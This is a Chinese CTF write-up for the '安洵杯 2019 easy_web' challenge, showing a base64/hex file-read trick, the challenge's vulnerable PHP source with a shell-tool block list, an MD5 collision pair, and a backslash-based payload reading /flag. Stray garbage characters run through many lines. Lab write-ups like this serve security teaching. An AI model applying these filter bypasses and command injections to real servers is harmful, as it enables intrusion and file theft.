[安洵杯 2019]easy_web

admin

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
7 ]) P" b( D4 z2 T- w<p>&nbsp;</p>
<p>&nbsp;</p>
+ g  R. ]4 r; @9 J& V+ G  C<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
3 A4 w9 `4 H) ]: c* K6 K/ u<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
% f5 M0 x8 |/ L3 R! I. Q7 z' v<p>&nbsp;</p>
<p>&nbsp;</p>
<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
2 j6 c$ V% `2 P. B  K9 M. V<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
1 R/ F. Z2 e. Q, |5 _. x<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
  M# J" c& B; C: c; s& g<p>&nbsp;</p>
<p>&nbsp;</p>
4 n, r3 @6 C9 |% L* e, ^) V<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
' E0 A# C" R! c/ I<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
0 y' A2 C/ ^% n" V6 ]<p>&nbsp;</p>
<p>&nbsp;</p>
* \! a: |3 d' c5 _<p>&nbsp;然后用hex解码一下得到了</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
1 E$ \6 B. P8 T( e$ c; M</div>
<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
" ^0 t; J2 j( m$ v7 U5 p! }- c<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
! b) r0 t9 \- A; o! l" I2 }( K</div>
<p>　　然后输入到地址栏</p>
<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
, [7 Q+ C8 |5 Z, |5 O4 H9 x<div class="cnblogs_code">
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
# X1 ?% }5 T) `0 M" g+ k1 @7 G4 Z+ `</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
3 \: F2 \6 d% @0 o9 x</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
) f; c+ w7 U6 [    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
7 g" p& j6 X" j- w) L9 v" Y9 L</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
  q3 N) R, @; Q* Z1 u
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
' e5 T' q! h3 Y; I2 h5 z4 A</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
9 w- S) W+ [- e9 Q0 E    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
$ }7 ?6 @" a. f1 E7 @4 S) U, T    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
. Z! o) z$ n% m5 T3 ?1 M}
+ j- a9 X) [5 |</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
* H- L  i# A( J/ h# D</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
; ]5 V  \8 N  v, K} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
- q8 ^- W9 m2 w$ M$ h. e: d4 U    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
4 H# s+ O4 Q; {- z6 R, p; J/ Q        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
! Y( U& m( s8 T3 {: t( |* h5 Y    }
! W6 ~. t/ H* i$ v  b' D7 M& K}

" p$ Z% ?7 @( ~- `- Y</span>?&gt;
&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
  body{
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
! V& R; b0 m3 p* t) T, ?   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
, O: o$ O+ N: [$ l0 z* q  x<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
* S7 [7 B4 `$ [+ n  o3 O&lt;body&gt;
&lt;/body&gt;
' \8 K! g% |  z, u) ]9 O&lt;/html&gt;</pre>
</div>
<p>结合前面的推断，关键代码就在</p>
$ F' j9 |* W  K7 K* e<div class="cnblogs_code">
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
0 O3 }4 `' f+ N# ~( u1 x    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
/ ^. q( a0 d* ]$ s! F5 h2 f2 R        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }</span></pre>
) L% l* K! m' X$ H</div>
+ n" Z/ G! @% n3 [, Z" e- q<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
3 k/ ]% S' r% y8 h8 k" \, e<div class="cnblogs_Highlighter">
. ~) f- J3 F8 `; b' w9 W<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
1 S4 O# G# z# Y/ q</pre>
</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
2 \$ A* M2 v6 v% C( n% @2 a- f<p>于是采用payload:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>&nbsp;</p>
6 }# `1 p. c: i+ d; f<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
<p>ls和l\s在命令执行的时候结果是一样的。</p>
6 t& H( {' t$ g3 s<p>然后发现根目录里面有/flag</p>
<p>于是payload:</p>
<div class="cnblogs_Highlighter">
: S+ X9 r4 O% W. Y, x<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
4 v1 |% P; K6 |6 V; M</pre>
3 }+ b# p/ m  `& @</div>
<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
$ k8 A: m7 ^. t- F<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
8 b/ {5 V( }  i% j! W4 \6 E0 v<p>&nbsp;</p>